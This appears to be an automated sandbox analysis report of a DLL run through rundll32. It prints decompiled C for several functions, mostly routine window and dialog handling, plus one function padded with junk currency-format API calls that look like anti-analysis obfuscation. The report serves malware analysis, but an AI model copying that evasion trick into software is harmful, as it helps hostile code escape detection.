Associated: 00000003.00000002.256890423.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256915965.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256923661.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256927715.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256970454.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: CurrencyFormat
String ID: eofgerDSQWzbxberfjXFSqwaKLIOrtyZD$xadqsavcbdfewescGADW
API String ID: 3383288267-3161301136
Opcode ID: 69c51003af96275454d602057090bf2f3f4a2519da6507d6aeea24ce666c7f9e
Instruction ID: 0456d89d922e5c10c0a98bb53afe019d0a386320811ad7c1ac40a02f71bd5ba4
Opcode Fuzzy Hash: 69c51003af96275454d602057090bf2f3f4a2519da6507d6aeea24ce666c7f9e
Instruction Fuzzy Hash: 71710875548355AFE304DF51CE82F1BBBE8EBCAB44F01580EF6809B2A1C670E9148F66

Uniqueness

Uniqueness Score: -1.00%

Function 1001AEE4 Relevance: 26.0, APIs: 17, Instructions: 452
windowkeyboardCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E1001AEE4(void* __ebx, signed int __ecx, void* __edi, void* __esi, void* __eflags, signed int _a4, struct tagMSG* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v24;
				int _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				struct HWND__* _v52;
				signed int _t139;
				signed int _t141;
				void* _t142;
				signed int _t146;
				signed int _t149;
				intOrPtr _t150;
				signed int _t152;
				signed char _t153;
				signed int _t154;
				signed int _t155;
				int _t156;
				signed int _t161;
				signed int _t165;
				void* _t167;
				signed char _t171;
				signed int _t172;
				signed int _t173;
				signed int _t174;
				signed char _t182;
				intOrPtr _t183;
				signed int _t184;
				short _t188;
				signed int _t189;
				signed int _t190;
				signed int _t191;
				signed int _t195;
				signed int _t198;
				signed char _t199;
				signed int _t200;
				signed int _t201;
				short _t204;
				signed int _t206;
				signed int _t207;
				signed int _t208;
				signed int _t209;
				void* _t211;
				signed int _t215;
				signed int _t216;
				struct HWND__* _t217;
				struct tagMSG* _t221;
				intOrPtr _t224;
				void* _t231;
				void* _t234;
				struct tagMSG* _t240;
				signed int _t242;
				int _t243;
				signed int _t244;
				long _t247;
				intOrPtr _t249;
				signed int _t251;
				signed int _t254;
				signed int _t255;
				signed int _t256;
				signed int _t257;
				signed int _t258;
				void* _t260;
				void* _t262;

				_t232 = __ecx;
				_t260 = _t262;
				_push(__ecx);
				_v8 = _v8 & 0x00000000;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t139 = E1001AD41(_a4, _a8);
				_t238 = _t139;
				if(_t139 == 0) {
					_t232 = _a4;
					_t231 = E10009228(_a4);
					if(_t231 != 0) {
						_t221 =  *((intOrPtr*)(_t231 + 0x44));
						_a8 = _t221;
						if(_t221 != 0) {
							while(1) {
								_t9 = _t231 + 0x40; // 0x40
								_t232 = _t9;
								_t258 =  *(E1000911A( &_a8));
								_t224 =  *((intOrPtr*)(_t258 + 4));
								if(_t224 != 0 && _t224 ==  *((intOrPtr*)(_t231 + 0x70))) {
									break;
								}
								if( *_t258 == 0 ||  *_t258 != GetFocus()) {
									if(_a8 != 0) {
										continue;
									} else {
									}
								} else {
									break;
								}
								goto L10;
							}
							_t238 = _t258;
						}
					}
				}
				L10:
				_t247 = 0;
				while(1) {
					_t238 = E1001AD93(_t232, _a4, _t238, _a12);
					if(_t238 == 0) {
						break;
					}
					_t142 = E1001A83E(_t238);
					_pop(_t232);
					if(_t142 == 0) {
						L14:
						if(_t238 == 0) {
							L21:
							__eflags =  *(_t238 + 4);
							if(__eflags == 0) {
								E10004E6E(0, _t232, _t238, _t247, __eflags);
								asm("int3");
								_push(0x28);
								E1001FBF7(E10034708, 0, _t238, _t247);
								_t146 = _a4;
								__eflags = _t146;
								if(_t146 != 0) {
									_v48 =  *((intOrPtr*)(_t146 + 0x20));
								} else {
									_v48 = _v48 & _t146;
								}
								_t240 = _a8;
								_t249 = _t240->message;
								_v32 = _t249;
								_v52 = GetFocus();
								_t149 = E1000A8F0(0, _t232, _t260, _t148);
								_t229 = 0x100;
								__eflags = _t249 - 0x100;
								_v24 = _t149;
								if(_t249 < 0x100) {
									L34:
									__eflags = _t249 + 0xfffffe00 - 9;
									if(_t249 + 0xfffffe00 > 9) {
										goto L56;
									} else {
										goto L35;
									}
								} else {
									__eflags = _t249 - 0x109;
									if(_t249 <= 0x109) {
										L35:
										__eflags = _t149;
										if(_t149 == 0) {
											L56:
											_t251 = 0;
											_v28 = 0;
											_t150 = E1000A8F0(_t229, _t232, _t260,  *_t240);
											_v44 = _v44 & 0;
											_v36 = _t150;
											_t152 = _v32 - _t229;
											__eflags = _t152;
											_v40 = 2;
											if(_t152 == 0) {
												_t153 = E1001A7F1(_v36, _t240);
												_t232 =  *(_t240 + 8) & 0x0000ffff;
												__eflags = _t232 - 0x1b;
												if(__eflags > 0) {
													__eflags = _t232 - 0x25;
													if(_t232 < 0x25) {
														goto L75;
													} else {
														__eflags = _t232 - 0x26;
														if(_t232 <= 0x26) {
															_v44 = 1;
															goto L110;
														} else {
															__eflags = _t232 - 0x28;
															if(_t232 <= 0x28) {
																L110:
																_t171 = E1001A7F1(_v24, _t240);
																__eflags = _t171 & 0x00000001;
																if((_t171 & 0x00000001) != 0) {
																	goto L75;
																} else {
																	__eflags = _v44;
																	_t232 = _a4;
																	_push(0);
																	if(_v44 == 0) {
																		_t172 = E1000F80A(_t229, _t232, _t240);
																	} else {
																		_t172 = E1000F7BC(_t229, _t232, _t240);
																	}
																	_t254 = _t172;
																	__eflags = _t254;
																	if(_t254 == 0) {
																		goto L75;
																	} else {
																		__eflags =  *(_t254 + 8);
																		if( *(_t254 + 8) != 0) {
																			_t232 = _a4;
																			E1000F366(_a4, _t254);
																		}
																		__eflags =  *(_t254 + 4);
																		if( *(_t254 + 4) == 0) {
																			_t173 =  *_t254;
																			__eflags = _t173;
																			if(_t173 == 0) {
																				_t232 = _a4;
																				_t174 = E1001A8AF(_a4, _v24, _v44);
																			} else {
																				_t174 = E1000A8F0(_t229, _t232, _t260, _t173);
																			}
																			_t242 = _t174;
																			__eflags = _t242;
																			if(_t242 == 0) {
																				goto L75;
																			} else {
																				_t229 = 0;
																				 *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x4c)) + 0x70)) = 0;
																				E1001A8E9(_t242);
																				__eflags =  *(_t254 + 8);
																				if( *(_t254 + 8) != 0) {
																					SendMessageA( *(_t242 + 0x20), 0xf1, 1, 0);
																				}
																				goto L125;
																			}
																		} else {
																			_t232 =  *(_t254 + 4);
																			 *((intOrPtr*)( *( *(_t254 + 4)) + 0xac))(_t240);
																			goto L125;
																		}
																	}
																}
															} else {
																__eflags = _t232 - 0x2b;
																if(_t232 != 0x2b) {
																	goto L75;
																} else {
																	goto L97;
																}
															}
														}
													}
													goto L126;
												} else {
													if(__eflags == 0) {
														L103:
														_t243 = 0;
														__eflags = 0;
														goto L104;
													} else {
														__eflags = _t232 - 3;
														if(_t232 == 3) {
															goto L103;
														} else {
															__eflags = _t232 - 9;
															if(_t232 == 9) {
																__eflags = _t153 & 0x00000002;
																if((_t153 & 0x00000002) != 0) {
																	goto L75;
																} else {
																	_t188 = GetKeyState(0x10);
																	_t255 = _a4;
																	__eflags = _t188;
																	_t229 = 0 | _t188 < 0x00000000;
																	_t232 = _t255;
																	_t189 = E1000F223(_t255, 0, _t188 < 0);
																	__eflags = _t189;
																	if(_t189 == 0) {
																		goto L75;
																	} else {
																		__eflags =  *(_t189 + 4);
																		if( *(_t189 + 4) == 0) {
																			_t190 =  *_t189;
																			__eflags = _t190;
																			if(_t190 == 0) {
																				_t232 = _t255;
																				_t191 = E10007A94(_t255, _v36, _t229);
																			} else {
																				_t191 = E1000A8F0(_t229, _t232, _t260, _t190);
																			}
																			_t244 = _t191;
																			__eflags = _t244;
																			if(_t244 != 0) {
																				 *( *((intOrPtr*)(_t255 + 0x4c)) + 0x70) =  *( *((intOrPtr*)(_t255 + 0x4c)) + 0x70) & 0x00000000;
																				E1001A8E9(_t244);
																				E1001AAB3(_t229, _t232, _t260, _v24, _t244);
																				_pop(_t232);
																			}
																		} else {
																			_t195 =  *(_t189 + 4);
																			_t232 = _t195;
																			 *((intOrPtr*)( *_t195 + 0xac))(_t240);
																		}
																		goto L125;
																	}
																}
																goto L126;
															} else {
																__eflags = _t232 - 0xd;
																if(_t232 == 0xd) {
																	L97:
																	__eflags = _t153 & 0x00000004;
																	if((_t153 & 0x00000004) != 0) {
																		goto L75;
																	} else {
																		_t182 = E1001A88E(_v24);
																		__eflags = _t182 & 0x00000010;
																		_pop(_t232);
																		if((_t182 & 0x00000010) == 0) {
																			_t183 = E1001AC34(_a4);
																		} else {
																			_t251 = _v24;
																			_t232 = _t251;
																			_t183 = E1000EF39(_t251);
																		}
																		_t243 = 0;
																		__eflags = _t251;
																		_v40 = _t183;
																		if(_t251 != 0) {
																			L105:
																			_t232 = _t251;
																			_t184 = E1000EFB3(_t251);
																			__eflags = _t184;
																			if(_t184 != 0) {
																				__eflags =  *((intOrPtr*)(_t251 + 0x50)) - _t243;
																				if( *((intOrPtr*)(_t251 + 0x50)) == _t243) {
																					goto L75;
																				} else {
																					_push(_t243);
																					_push(_t243);
																					_push(_t243);
																					_push(1);
																					_push(0xfffffdd9);
																					_push(_t251);
																					_v8 = _t243;
																					E1000F010();
																					_v8 = _v8 | 0xffffffff;
																					goto L125;
																				}
																			} else {
																				MessageBeep(_t243);
																				goto L75;
																			}
																		} else {
																			L104:
																			_t251 = E1001AB2E(_a4, _v40);
																			__eflags = _t251 - _t243;
																			if(_t251 == _t243) {
																				goto L75;
																			} else {
																				goto L105;
																			}
																		}
																	}
																	goto L126;
																} else {
																	goto L75;
																}
															}
														}
													}
												}
												goto L79;
											} else {
												_t198 = _t152;
												__eflags = _t198;
												if(_t198 == 0) {
													L62:
													_t199 = E1001A7F1(_v36, _t240);
													__eflags = _v32 - 0x102;
													if(_v32 != 0x102) {
														L64:
														_t232 =  *(_t240 + 8) & 0x0000ffff;
														__eflags = _t232 - 9;
														if(_t232 != 9) {
															L66:
															__eflags = _t232 - 0x20;
															if(__eflags == 0) {
																goto L54;
															} else {
																_push(_t240);
																_t200 = E1001AEE4(_t229, _t232, _t240, _t251, __eflags, _a4, _v36);
																__eflags = _t200;
																if(_t200 == 0) {
																	goto L75;
																} else {
																	_t201 =  *(_t200 + 4);
																	__eflags = _t201;
																	if(_t201 == 0) {
																		goto L75;
																	} else {
																		_t232 = _t201;
																		E10014E50(_t201, _t240);
																		L125:
																		_v28 = 1;
																	}
																}
																goto L79;
															}
														} else {
															__eflags = _t199 & 0x00000002;
															if((_t199 & 0x00000002) != 0) {
																goto L75;
															} else {
																goto L66;
															}
														}
													} else {
														__eflags = _t199 & 0x00000084;
														if((_t199 & 0x00000084) != 0) {
															goto L75;
														} else {
															goto L64;
														}
													}
												} else {
													__eflags = _t198 != 4;
													if(_t198 != 4) {
														L75:
														_t154 = _a4;
														__eflags =  *(_t154 + 0x3c) & 0x00001000;
														if(( *(_t154 + 0x3c) & 0x00001000) == 0) {
															_t165 = IsDialogMessageA( *(_t154 + 0x20), _a8);
															__eflags = _t165;
															_v28 = _t165;
															if(_t165 != 0) {
																_t167 = E1000A8F0(_t229, _t232, _t260, GetFocus());
																__eflags = _t167 - _v24;
																if(_t167 != _v24) {
																	E1001AA46(_t232, E1000A8F0(_t229, _t232, _t260, GetFocus()));
																	_pop(_t232);
																}
															}
														}
														L79:
														_t155 = IsWindow(_v52);
														__eflags = _t155;
														if(_t155 != 0) {
															E1001AAB3(_t229, _t232, _t260, _v24, E1000A8F0(_t229, _t232, _t260, GetFocus()));
															_pop(_t234);
															_t161 = IsWindow(_v48);
															__eflags = _t161;
															if(_t161 != 0) {
																E1001AC61(_a4, _v24, E1000A8F0(_t229, _t234, _t260, GetFocus()));
															}
														}
														_t156 = _v28;
													} else {
														__eflags = _v24;
														if(_v24 != 0) {
															L61:
															__eflags =  *(_t240 + 8) - 0x20;
															if( *(_t240 + 8) == 0x20) {
																goto L75;
															} else {
																goto L62;
															}
														} else {
															_t204 = GetKeyState(0x12);
															__eflags = _t204;
															if(_t204 >= 0) {
																goto L75;
															} else {
																goto L61;
															}
														}
													}
												}
											}
										} else {
											_t256 = _t149;
											while(1) {
												__eflags =  *(_t256 + 0x50);
												if( *(_t256 + 0x50) != 0) {
													break;
												}
												_t211 = E1000A8F0(_t229, _t232, _t260, GetParent( *(_t256 + 0x20)));
												__eflags = _t211 - _a4;
												if(_t211 != _a4) {
													_t256 = E1000A8F0(_t229, _t232, _t260, GetParent( *(_t256 + 0x20)));
													__eflags = _t256;
													if(_t256 != 0) {
														continue;
													}
												}
												break;
											}
											__eflags = _t256;
											if(_t256 == 0) {
												L45:
												__eflags = _v32 - 0x101;
												if(_v32 == 0x101) {
													L48:
													__eflags = _t256;
													if(_t256 == 0) {
														goto L55;
													} else {
														_t257 =  *(_t256 + 0x50);
														__eflags = _t257;
														if(_t257 == 0) {
															goto L55;
														} else {
															_t206 = _a8->wParam & 0x0000ffff;
															__eflags = _t206 - 0xd;
															if(_t206 != 0xd) {
																L52:
																__eflags = _t206 - 0x1b;
																if(_t206 != 0x1b) {
																	goto L55;
																} else {
																	__eflags =  *(_t257 + 0x84) & 0x00000002;
																	if(( *(_t257 + 0x84) & 0x00000002) == 0) {
																		goto L55;
																	} else {
																		goto L54;
																	}
																}
															} else {
																__eflags =  *(_t257 + 0x84) & 0x00000001;
																if(( *(_t257 + 0x84) & 0x00000001) != 0) {
																	L54:
																	_t156 = 0;
																} else {
																	goto L52;
																}
															}
														}
													}
												} else {
													__eflags = _v32 - _t229;
													if(_v32 == _t229) {
														goto L48;
													} else {
														__eflags = _v32 - 0x102;
														if(_v32 != 0x102) {
															L55:
															_t240 = _a8;
															goto L56;
														} else {
															goto L48;
														}
													}
												}
											} else {
												_t207 =  *(_t256 + 0x50);
												__eflags = _t207;
												if(_t207 == 0) {
													goto L45;
												} else {
													__eflags =  *(_t207 + 0x58);
													if( *(_t207 + 0x58) == 0) {
														goto L45;
													} else {
														_t208 =  *(_t207 + 0x58);
														_t232 =  *_t208;
														_t209 =  *((intOrPtr*)( *_t208 + 0x14))(_t208, _a8);
														__eflags = _t209;
														if(_t209 != 0) {
															goto L45;
														} else {
															_t156 = _t209 + 1;
														}
													}
												}
											}
										}
									} else {
										goto L34;
									}
								}
								return E1001FC9C(_t156);
							} else {
								_t232 =  *(_t238 + 4);
								_t215 =  *((intOrPtr*)( *( *(_t238 + 4)) + 0x78))();
								__eflags = _t215 & 0x08000000;
								if((_t215 & 0x08000000) == 0) {
									goto L20;
								} else {
									goto L23;
								}
							}
						} else {
							_t216 =  *(_t238 + 4);
							if(_t216 == 0) {
								_t217 =  *_t238;
							} else {
								_t217 =  *(_t216 + 0x24);
							}
							if(_t217 == 0) {
								goto L21;
							} else {
								if(IsWindowEnabled(_t217) == 0) {
									L23:
									__eflags = _t238 - _v8;
									if(_t238 == _v8) {
										break;
									} else {
										__eflags = _v8;
										if(_v8 == 0) {
											_v8 = _t238;
										}
										_t247 = _t247 + 1;
										__eflags = _t247 - 0x200;
										if(_t247 < 0x200) {
											continue;
										} else {
											break;
										}
									}
								} else {
									L20:
									_t141 = _t238;
									L28:
									return _t141;
								}
							}
						}
					} else {
						_t232 = _a4;
						_t238 = E1000F223(_a4, _t238, 0);
						if(_t238 == 0) {
							break;
						} else {
							goto L14;
						}
					}
					L126:
				}
				_t141 = 0;
				__eflags = 0;
				goto L28;
			}

APIs

GetFocus.USER32(?), ref: 1001AF37
IsWindowEnabled.USER32(?), ref: 1001AF93
__EH_prolog3_catch.LIBCMT ref: 1001AFE1
GetFocus.USER32(00000028), ref: 1001B001
GetParent.USER32(?), ref: 1001B04C
GetParent.USER32(?), ref: 1001B05C
GetKeyState.USER32 ref: 1001B11A
IsDialogMessageA.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 1001B1CE
GetFocus.USER32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 1001B1E1
GetFocus.USER32(00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 1001B1EE
IsWindow.USER32(?), ref: 1001B206
GetFocus.USER32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 1001B212
IsWindow.USER32(?), ref: 1001B228
GetFocus.USER32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 1001B22E
GetKeyState.USER32 ref: 1001B257
MessageBeep.USER32(00000000), ref: 1001B34E

Memory Dump Source

Source File: 00000003.00000002.256826157.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.256820228.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256858129.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256868016.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256885461.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256890423.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256915965.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256923661.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256927715.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256970454.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Focus$Window$MessageParentState$BeepDialogEnabledH_prolog3_catch
String ID:
API String ID: 656273425-0
Opcode ID: 7cea107795b1e2e3285d96fe1b936d401bf20cc77758f65a3f6ffed830a0db35
Instruction ID: 56f928e57334fa6d51f2d895fa8adec4f86d4fba5de9bb308060e6b64de8da3e
Opcode Fuzzy Hash: 7cea107795b1e2e3285d96fe1b936d401bf20cc77758f65a3f6ffed830a0db35
Instruction Fuzzy Hash: 12F1DF35900A16AFDB11DFA0C894AAE7BF5EF49390F528029F815AF162DB34EDC1CB51

Uniqueness

Uniqueness Score: -1.00%

Function 10003567 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 143
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 83%

			E10003567(int _a4) {
				long _t40;
				signed int _t54;
				int _t55;
				signed int _t63;
				void* _t87;
				short* _t89;

				_t87 = _a4;
				_t35 = 0;
				if(_t87 != 0) {
					_t89 = L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD";
					if( *((intOrPtr*)(_t87 + 0x10)) != 0) {
						_a4 =  *((intOrPtr*)(_t87 + 4));
						_t63 = GetCurrencyFormatW(0, 0x11d4, _t89, 0, L"xadqsavcbdfewescGADW", 0x22b9);
						 *((intOrPtr*)(_t63 *  *0x100440d8 +  *((intOrPtr*)( *_t87 + 0x28)) + _a4))(_a4, 0, 0);
						_t35 = 0;
					}
					 *0x10046a64( *((intOrPtr*)(_t87 + 0x30)) + GetCurrencyFormatW(_t35, 0x11d4, _t89, _t35, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440cc * 8);
					_t40 = 0;
					if( *((intOrPtr*)(_t87 + 8)) == 0) {
						L9:
						if( *((intOrPtr*)(_t87 + 4)) != _t40) {
							 *((intOrPtr*)(_t87 + 0x20))( *((intOrPtr*)(_t87 + 4)), 0, GetCurrencyFormatW(_t40, 0x11d4, _t89, _t40, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440e0 + 0x8000,  *((intOrPtr*)(_t87 + 0x34)));
							_t40 = 0;
						}
						return HeapFree(GetProcessHeap(), _t40, _t87);
					} else {
						_a4 = 0;
						if(GetCurrencyFormatW(0, 0x11d4, _t89, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440cc +  *((intOrPtr*)(_t87 + 0xc)) <= 0) {
							L8:
							 *0x10046a64( *((intOrPtr*)(_t87 + 8)) + GetCurrencyFormatW(0, 0x11d4, _t89, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440dc * 4);
							_t40 = 0;
							goto L9;
						} else {
							goto L5;
						}
						do {
							L5:
							_t54 = GetCurrencyFormatW(0, 0x11d4, _t89, 0, L"xadqsavcbdfewescGADW", 0x22b9);
							_t55 = 0;
							if( *((intOrPtr*)( *((intOrPtr*)(_t87 + 8)) + (_t54 *  *0x100440cc + _a4) * 4)) != 0) {
								 *((intOrPtr*)(_t87 + 0x2c))( *((intOrPtr*)( *((intOrPtr*)(_t87 + 8)) + (GetCurrencyFormatW(0, 0x11d4, _t89, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440dc + _a4) * 4)),  *((intOrPtr*)(_t87 + 0x34)));
								_t55 = 0;
							}
							_a4 = _a4 + 1;
						} while (_a4 < GetCurrencyFormatW(_t55, 0x11d4, _t89, _t55, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440cc +  *((intOrPtr*)(_t87 + 0xc)));
						goto L8;
					}
				}
				return 0;
			}

APIs

GetCurrencyFormatW.KERNEL32 ref: 100035A3
GetCurrencyFormatW.KERNEL32 ref: 100035CF
??3@YAXPAX@Z.MSVCRT ref: 100035DF
GetCurrencyFormatW.KERNEL32 ref: 10003603
GetCurrencyFormatW.KERNEL32 ref: 10003623
GetCurrencyFormatW.KERNEL32 ref: 1000364D
GetCurrencyFormatW.KERNEL32 ref: 10003679
GetCurrencyFormatW.KERNEL32 ref: 1000369B
??3@YAXPAX@Z.MSVCRT ref: 100036AB
GetCurrencyFormatW.KERNEL32 ref: 100036CA
GetProcessHeap.KERNEL32(00000000,000022B9,?,?,?,?,?,?,?,?,?,?,10003044,10003057,10003090,1000309F), ref: 100036E8
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,10003044,10003057,10003090,1000309F,00000000), ref: 100036EF

Strings

xadqsavcbdfewescGADW, xrefs: 10003596, 100035C6, 100035F6, 10003618, 10003644, 10003670, 10003690, 100036C1
eofgerDSQWzbxberfjXFSqwaKLIOrtyZD, xrefs: 1000357A, 10003582, 1000359C, 100035CC, 100035FC, 1000361F, 1000364A, 10003676, 10003697, 100036C7

Memory Dump Source

Source File: 00000003.00000002.256826157.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.256820228.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256858129.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256868016.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256885461.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256890423.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256915965.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256923661.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256927715.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256970454.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: CurrencyFormat$??3@Heap$FreeProcess
String ID: eofgerDSQWzbxberfjXFSqwaKLIOrtyZD$xadqsavcbdfewescGADW
API String ID: 447117116-3161301136
Opcode ID: c986ef1d440be94ff09f6e1d70f323da872e541a9ac047334e8279f144c68349
Instruction ID: f2d026fc60e697fd50327b110b185c24fe47079f9fec1f7b52e43e207d21a45c
Opcode Fuzzy Hash: c986ef1d440be94ff09f6e1d70f323da872e541a9ac047334e8279f144c68349
Instruction Fuzzy Hash: 7B415B71104705BFE215EB60CD85E67BBECEB4A385F028819F742DB5A1D732E8548F64

Uniqueness

Uniqueness Score: -1.00%

Function 1000A2C4 Relevance: 19.7, APIs: 13, Instructions: 176
windowCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E1000A2C4(void* __ebx, intOrPtr __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				struct tagRECT _v28;
				struct tagRECT _v44;
				struct tagRECT _v60;
				struct tagRECT _v80;
				char _v100;
				void* __edi;
				intOrPtr _t58;
				struct HWND__* _t59;
				intOrPtr _t94;
				signed int _t103;
				struct HWND__* _t104;
				void* _t105;
				struct HWND__* _t107;
				long _t108;
				long _t116;
				void* _t119;
				struct HWND__* _t121;
				void* _t123;
				intOrPtr _t125;
				intOrPtr _t129;

				_t119 = __edx;
				_t105 = __ebx;
				_t125 = __ecx;
				_v12 = __ecx;
				_v8 = E1000EEC4(__ecx);
				_t58 = _a4;
				if(_t58 == 0) {
					if((_v8 & 0x40000000) == 0) {
						_t59 = GetWindow( *(__ecx + 0x20), 4);
					} else {
						_t59 = GetParent( *(__ecx + 0x20));
					}
					_t121 = _t59;
					if(_t121 != 0) {
						_t104 = SendMessageA(_t121, 0x36b, 0, 0);
						if(_t104 != 0) {
							_t121 = _t104;
						}
					}
				} else {
					_t4 = _t58 + 0x20; // 0xc033d88b
					_t121 =  *_t4;
				}
				_push(_t105);
				GetWindowRect( *(_t125 + 0x20),  &_v60);
				if((_v8 & 0x40000000) != 0) {
					_t107 = GetParent( *(_t125 + 0x20));
					GetClientRect(_t107,  &_v28);
					GetClientRect(_t121,  &_v44);
					MapWindowPoints(_t121, _t107,  &_v44, 2);
				} else {
					if(_t121 != 0) {
						_t103 = GetWindowLongA(_t121, 0xfffffff0);
						if((_t103 & 0x10000000) == 0 || (_t103 & 0x20000000) != 0) {
							_t121 = 0;
						}
					}
					_v100 = 0x28;
					if(_t121 != 0) {
						GetWindowRect(_t121,  &_v44);
						E10008551(_t121, E100084E6(_t121, 2),  &_v100);
						CopyRect( &_v28,  &_v80);
					} else {
						_t94 = E10005CAE();
						if(_t94 != 0) {
							_t94 =  *((intOrPtr*)(_t94 + 0x20));
						}
						E10008551(_t121, E100084E6(_t94, 1),  &_v100);
						CopyRect( &_v44,  &_v80);
						CopyRect( &_v28,  &_v80);
					}
				}
				_t108 = _v60.left;
				asm("cdq");
				_t123 = _v60.right - _t108;
				asm("cdq");
				_t120 = _v44.bottom;
				_t116 = (_v44.left + _v44.right - _t119 >> 1) - (_t123 - _t119 >> 1);
				_a4 = _v60.bottom - _v60.top;
				asm("cdq");
				asm("cdq");
				_t129 = (_v44.top + _v44.bottom - _v44.bottom >> 1) - (_a4 - _t120 >> 1);
				if(_t116 >= _v28.left) {
					if(_t123 + _t116 > _v28.right) {
						_t116 = _t108 - _v60.right + _v28.right;
					}
				} else {
					_t116 = _v28.left;
				}
				if(_t129 >= _v28.top) {
					if(_a4 + _t129 > _v28.bottom) {
						_t129 = _v60.top - _v60.bottom + _v28.bottom;
					}
				} else {
					_t129 = _v28.top;
				}
				return E1000F1A1(_v12, 0, _t116, _t129, 0xffffffff, 0xffffffff, 0x15);
			}

APIs

Part of subcall function 1000EEC4: GetWindowLongA.USER32 ref: 1000EECF

GetParent.USER32(?), ref: 1000A2F1
SendMessageA.USER32 ref: 1000A314
GetWindowRect.USER32 ref: 1000A32E
GetWindowLongA.USER32 ref: 1000A344
CopyRect.USER32 ref: 1000A391
CopyRect.USER32 ref: 1000A39B
GetWindowRect.USER32 ref: 1000A3A4
CopyRect.USER32 ref: 1000A3C0

Memory Dump Source

Source File: 00000003.00000002.256826157.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.256820228.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256858129.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256868016.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256885461.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256890423.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256915965.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256923661.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256927715.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256970454.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Rect$Window$Copy$Long$MessageParentSend
String ID:
API String ID: 808654186-0
Opcode ID: 9ff1ffca443c0671e985d08d4d0a79713c159cacf4ec812370c5e182881e21c9
Instruction ID: 63e85339992314f50ad76cd4fa936f515b0dc0fc70569d21828395b99dd1d8a3
Opcode Fuzzy Hash: 9ff1ffca443c0671e985d08d4d0a79713c159cacf4ec812370c5e182881e21c9
Instruction Fuzzy Hash: 2C513F76D00619AFEB01CBA8CC85EEEBBB9EB49390F154214F905B7195D730EE858B60

Uniqueness

Uniqueness Score: -1.00%

Function 100056D9 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 56
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

